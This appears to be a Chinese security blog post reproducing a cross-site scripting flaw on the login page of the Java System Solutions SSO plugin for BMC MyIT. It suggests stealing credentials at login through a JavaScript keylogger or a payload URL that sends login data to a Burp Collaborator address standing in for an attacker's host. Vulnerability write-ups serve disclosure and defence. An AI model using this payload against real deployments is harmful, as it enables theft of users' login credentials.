登陆 注册

JAVA SYSTEM SOLUTIONS SSO PLUGIN FOR BMC MYIT 跨站脚本漏洞

Lzers 2018-09-19 漏洞事件

漏洞复现过程 JAVA SYSTEM SOLUTIONS SSO PLUGIN FOR BMC MYIT 跨站脚本漏洞  漏洞事件 第1张漏洞复现过程

  漏洞描述是这样说的。

新思路-登录劫持 JAVA SYSTEM SOLUTIONS SSO PLUGIN FOR BMC MYIT 跨站脚本漏洞  漏洞事件 第2张新思路-登录劫持

  那么问题来了,这是一个登录界面的XSS,而XSS导致的结果是泄露用户Cookie,用户还没登陆怎么能拿到用户登录后的Cookie呢?

  • 方法1:用JS记录键盘

  • 方法2:Burp的Collaborator client插件获取用户登录信息

  将Burp的Collaborator client插件生成的地址复制一下。

  使用payload:/ux/jss-sso/arslogin?http://DNS隧道地址

  点击登录以后,在Burp的Collaborator client插件中查看请求信息

  使用Burp的Collaborator client插件要比直接利用XSS更加方便直接。


生成海报
请发表您的评论
Lzers

Lzers

安全路漫漫,莫愁前方无知己
855文章数 31评论数
请关注微信公众号
微信二维码
不容错过
Powered By HeiBaiTeam.